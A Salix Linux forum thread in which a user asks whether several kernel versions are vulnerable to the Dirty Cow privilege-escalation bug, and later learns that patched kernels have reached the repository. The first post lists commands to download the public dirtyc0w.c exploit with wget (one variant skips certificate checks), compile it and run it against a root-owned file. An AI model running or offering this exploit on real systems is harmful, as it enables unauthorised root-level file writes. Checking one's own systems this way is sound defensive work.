Dirty Cow

[witek]

Hello,

Can anybody explain me whether these versions of Salix are vulnerable to Dirty Cow exploit:

13.1 kernel 2.6.33 (it seems not vulnerable but I want to be sure)

14.1 kernel 3.10.17 (it seems vulnerable)
14.1 kernel 3.10.103 (it seems vulnerable but the system crashes after vulnerability test)

If they are then is there a chance to have a patched kernel in the repo or I need to compile myself?

The test I found to check the exploit is this:

download the exploit as an unprivileged user:

Code: Select all

wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c

if problem then use --no-check-certificate flag

Code: Select all

wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c  --no-check-certificate

create a file owned by root:

Code: Select all

sudo sh -c "echo Text in file > foo"

compile dirtyc0w.c:

Code: Select all

gcc -lpthread dirtyc0w.c -o dirtyc0w

or:

Code: Select all

gcc -pthread dirtyc0w.c -o dirtyc0w

Run the local expliot

Code: Select all

./dirtyc0w foo mooooooo

to check if the file owned by root changed:

Code: Select all

cat foo

[laprjns]

Did you check the Slackware changelog for this. It looks to me like there have been updates to 14.2, 14.1, 14.0 kernels to explicitly address the Dirty Cow exploit. It also appears that there where significant changes to 13.37 and 13.1 on October 31 but they do not explicitly says that they where for Dirty Cow.

[witek]

Perfect timing. It looks the new kernels have just appeared in the repository. I bet they were absent when I was writing my post. Kernel 3.10.104 seems to be not vulnerable. It took very long however. Debian patched the kernel weeks faster.